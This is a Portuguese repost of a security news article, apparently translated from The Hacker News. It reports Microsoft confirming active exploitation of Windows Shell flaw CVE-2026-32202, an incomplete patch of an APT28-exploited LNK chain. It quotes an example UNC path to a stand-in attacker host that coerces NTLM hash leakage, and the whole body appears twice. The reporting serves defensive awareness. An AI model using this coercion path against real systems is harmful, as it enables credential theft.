⚡ Não perca: notícia importante no ar! ⚡
Leia, comente e fique sempre atualizado!
Apoie esse projeto de divulgacao de noticias! Clique aqui
A Microsoft revisou na segunda-feira seu comunicado sobre uma falha de segurança de alta gravidade, agora corrigida, que afeta o Windows Shell, para reconhecer que ele foi explorado ativamente em estado selvagem.
A vulnerabilidade em questão é CVE-2026-32202 (pontuação CVSS: 4,3), uma vulnerabilidade de falsificação que pode permitir que um invasor acesse informações confidenciais. O problema foi abordado como parte da atualização do Patch Tuesday deste mês.
“A falha do mecanismo de proteção no Windows Shell permite que um invasor não autorizado execute falsificação em uma rede”, observou a Microsoft em um alerta. “Um invasor teria que enviar à vítima um arquivo malicioso que a vítima teria que executar”.
"Um invasor que explorar a vulnerabilidade com sucesso poderá visualizar algumas informações confidenciais (Confidencialidade), mas nem todos os recursos do componente afetado poderão ser divulgados ao invasor. O invasor não pode fazer alterações nas informações divulgadas (Integridade) ou limitar o acesso ao recurso (Disponibilidade)."
Em 27 de abril de 2026, a Microsoft disse que retificou o "Índice de exploração, sinalizador explorado e vetor CVSS", pois estavam incorretos quando foram publicados em 14 de abril.
Embora a gigante da tecnologia não tenha compartilhado nenhum detalhe sobre a atividade de exploração, o pesquisador de segurança da Akamai, Maor Dahan, responsável pela descoberta e relato do bug, disse que a vulnerabilidade de clique zero decorre de um patch incompleto para CVE-2026-21510.
Este último foi transformado em arma por um grupo estatal russo rastreado como APT28 (também conhecido como Fancy Bear, Forest Blizzard, GruesomeLarch e Pawn Storm) junto com CVE-2026-21513 como parte de uma cadeia de exploração -
CVE-2026-21510 (pontuação CVSS: 8,8) – Uma falha no mecanismo de proteção no Windows Shell que permite que um invasor não autorizado ignore um recurso de segurança em uma rede. (Corrigido pela Microsoft em fevereiro de 2026)
CVE-2026-21513 (pontuação CVSS: 8,8) – Uma falha no mecanismo de proteção no MSHTML Framework que permite que um invasor não autorizado ignore um recurso de segurança em uma rede. (Corrigido pela Microsoft em fevereiro de 2026)
É importante notar que o abuso do CVE-2026-21513 também foi sinalizado pela empresa de infraestrutura e segurança web no início do mês passado, vinculando-o ao APT28 após desenterrar um artefato malicioso em janeiro de 2026.
Exploração CVE-2026-21510
A campanha, visando a Ucrânia e a UE. nações em dezembro de 2025, aproveita um arquivo malicioso do Windows Shortcut (LNK) para explorar as duas vulnerabilidades, ignorando efetivamente o Microsoft Defender SmartScreen e permitindo a execução de código controlado pelo invasor.
“O APT28 aproveita o mecanismo de análise de namespace do Windows Shell para carregar uma biblioteca de vínculo dinâmico (DLL) de um servidor remoto usando um caminho UNC”, explicou Dahan. "A DLL é carregada como parte dos objetos do Painel de Controle (CPL) sem a validação adequada da zona de rede.
Akamai disse que o patch de fevereiro de 2026, embora mitigasse o risco de execução remota de código ao acionar uma verificação SmartScreen da assinatura digital e da zona de origem do arquivo CPL, ainda permitia que a máquina vítima se autenticasse no servidor do invasor e buscasse automaticamente o arquivo CPL, resolvendo o caminho da Convenção de Nomenclatura Universal (UNC) e iniciando uma conexão SMB sem exigir interação do usuário.
"Quando esse caminho é UNC (como '\\attacker.com\share\payload.cpl'), o Windows inicia uma conexão SMB com o servidor do invasor", disse Dahan. “Essa conexão de bloco de mensagens do servidor (SMB) aciona um handshake de autenticação NTLM automático, enviando o hash Net-NTLMv2 da vítima ao invasor, que pode ser usado posteriormente para ataques de retransmissão NTLM e cracking offline.”
“Enquanto a Microsoft corrigiu o RCE inicial (CVE-2026-21510), uma falha de coerção de autenticação (CVE-2026-32202) permaneceu. Essa lacuna entre a resolução do caminho e a verificação de confiança deixou um vetor de roubo de credenciais sem clique por meio de arquivos LNK analisados automaticamente."
A vulnerabilidade em questão é CVE-2026-32202 (pontuação CVSS: 4,3), uma vulnerabilidade de falsificação que pode permitir que um invasor acesse informações confidenciais. O problema foi abordado como parte da atualização do Patch Tuesday deste mês.
“A falha do mecanismo de proteção no Windows Shell permite que um invasor não autorizado execute falsificação em uma rede”, observou a Microsoft em um alerta. “Um invasor teria que enviar à vítima um arquivo malicioso que a vítima teria que executar”.
"Um invasor que explorar a vulnerabilidade com sucesso poderá visualizar algumas informações confidenciais (Confidencialidade), mas nem todos os recursos do componente afetado poderão ser divulgados ao invasor. O invasor não pode fazer alterações nas informações divulgadas (Integridade) ou limitar o acesso ao recurso (Disponibilidade)."
Em 27 de abril de 2026, a Microsoft disse que retificou o "Índice de exploração, sinalizador explorado e vetor CVSS", pois estavam incorretos quando foram publicados em 14 de abril.
Embora a gigante da tecnologia não tenha compartilhado nenhum detalhe sobre a atividade de exploração, o pesquisador de segurança da Akamai, Maor Dahan, responsável pela descoberta e relato do bug, disse que a vulnerabilidade de clique zero decorre de um patch incompleto para CVE-2026-21510.
Este último foi transformado em arma por um grupo estatal russo rastreado como APT28 (também conhecido como Fancy Bear, Forest Blizzard, GruesomeLarch e Pawn Storm) junto com CVE-2026-21513 como parte de uma cadeia de exploração -
CVE-2026-21510 (pontuação CVSS: 8,8) – Uma falha no mecanismo de proteção no Windows Shell que permite que um invasor não autorizado ignore um recurso de segurança em uma rede. (Corrigido pela Microsoft em fevereiro de 2026)
CVE-2026-21513 (pontuação CVSS: 8,8) – Uma falha no mecanismo de proteção no MSHTML Framework que permite que um invasor não autorizado ignore um recurso de segurança em uma rede. (Corrigido pela Microsoft em fevereiro de 2026)
É importante notar que o abuso do CVE-2026-21513 também foi sinalizado pela empresa de infraestrutura e segurança web no início do mês passado, vinculando-o ao APT28 após desenterrar um artefato malicioso em janeiro de 2026.
Exploração CVE-2026-21510
A campanha, visando a Ucrânia e a UE. nações em dezembro de 2025, aproveita um arquivo malicioso do Windows Shortcut (LNK) para explorar as duas vulnerabilidades, ignorando efetivamente o Microsoft Defender SmartScreen e permitindo a execução de código controlado pelo invasor.
“O APT28 aproveita o mecanismo de análise de namespace do Windows Shell para carregar uma biblioteca de vínculo dinâmico (DLL) de um servidor remoto usando um caminho UNC”, explicou Dahan. "A DLL é carregada como parte dos objetos do Painel de Controle (CPL) sem a validação adequada da zona de rede.
Akamai disse que o patch de fevereiro de 2026, embora mitigasse o risco de execução remota de código ao acionar uma verificação SmartScreen da assinatura digital e da zona de origem do arquivo CPL, ainda permitia que a máquina vítima se autenticasse no servidor do invasor e buscasse automaticamente o arquivo CPL, resolvendo o caminho da Convenção de Nomenclatura Universal (UNC) e iniciando uma conexão SMB sem exigir interação do usuário.
"Quando esse caminho é UNC (como '\\attacker.com\share\payload.cpl'), o Windows inicia uma conexão SMB com o servidor do invasor", disse Dahan. “Essa conexão de bloco de mensagens do servidor (SMB) aciona um handshake de autenticação NTLM automático, enviando o hash Net-NTLMv2 da vítima ao invasor, que pode ser usado posteriormente para ataques de retransmissão NTLM e cracking offline.”
“Enquanto a Microsoft corrigiu o RCE inicial (CVE-2026-21510), uma falha de coerção de autenticação (CVE-2026-32202) permaneceu. Essa lacuna entre a resolução do caminho e a verificação de confiança deixou um vetor de roubo de credenciais sem clique por meio de arquivos LNK analisados automaticamente."
Fonte: https://thehackernews.com
#samirnews #samir #news #boletimtec #microsoft #confirma #exploração #ativa #do #windows #shell #cve202632202
⚡ Fique ligado: novidades e promoções em breve por aqui! ⚡
Postar um comentário